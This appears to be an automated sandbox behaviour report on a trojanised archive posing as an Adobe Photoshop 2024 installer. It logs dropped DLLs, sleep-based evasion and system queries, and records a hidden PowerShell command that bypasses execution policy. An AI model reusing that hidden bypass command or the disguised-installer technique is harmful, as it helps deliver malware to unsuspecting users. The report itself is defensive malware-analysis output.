Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 13B0000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 31F0000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 51F0000 memory commit | memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeMemory allocated: E70000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeMemory allocated: FE0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_05254D7D sgdt fword ptr [eax]6_2_05254D7D
Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 0_2_01680000 sldt word ptr [eax]0_2_01680000
Source: C:\Windows\SysWOW64\unarchiver.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7483Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2220Jump to behavior
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\AdobePIP.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\PhotoshopViews.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\AdobeOwl.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Photoshop.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\PhotoshopCloud.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\PSLibs.exeJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\NPoco.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Base.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Contracts.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Business.XmlSerializers.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Business.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Data.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.DiagramNet.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Ninject.dllJump to dropped file
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 344Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe TID: 5428Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe TID: 5428Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe TID: 2804Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 0_2_0135B1D6 GetSystemInfo,0_2_0135B1D6
Source: C:\Windows\SysWOW64\unarchiver.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: Adobe_Photoshop_2024 (1).zipBinary or memory string: dqEmUg
Source: instrumental-epic-country-228216.mp3Binary or memory string: QeMU_]E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_05FE3BE0 LdrInitializeThunk,6_2_05FE3BE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(Get-CimInstance -ClassName Win32_VideoController).Caption;"
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg" "C:\Users\user\Desktop\Adobe_Photoshop_2024 (1).zip"Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(Get-CimInstance -ClassName Win32_VideoController).Caption;"Jump to behavior
Source: Photoshop.dllBinary or memory string: $$$/private/Credits/Blank=^rL$$$/private/Credits/AutoGen/126000=India Team Program Manager: Poonam Bhalla
Source: Photoshop.dllBinary or memory string: $$$/private/Credits/Blank=^rU$$$/private/Credits/AutoGen/137000=Experience Design Program Manager: Rachel Castillo
Source: Photoshop.dllBinary or memory string: $$$/private/Credits/Blank=^rM$$$/private/Credits/AutoGen/127000=ART Team Program Manager: Jeffrey O'Donald
Source: Photoshop.dllBinary or memory string: $$$/private/Credits/Blank=^rV$$$/private/Credits/AutoGen/124000=Digital Imaging Group Program Manager: Min Plunkett
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeQueries volume information: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeQueries volume information: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Base.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeQueries volume information: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Ninject.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeQueries volume information: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Contracts.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeQueries volume information: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Data.dll VolumeInformationJump to behavior
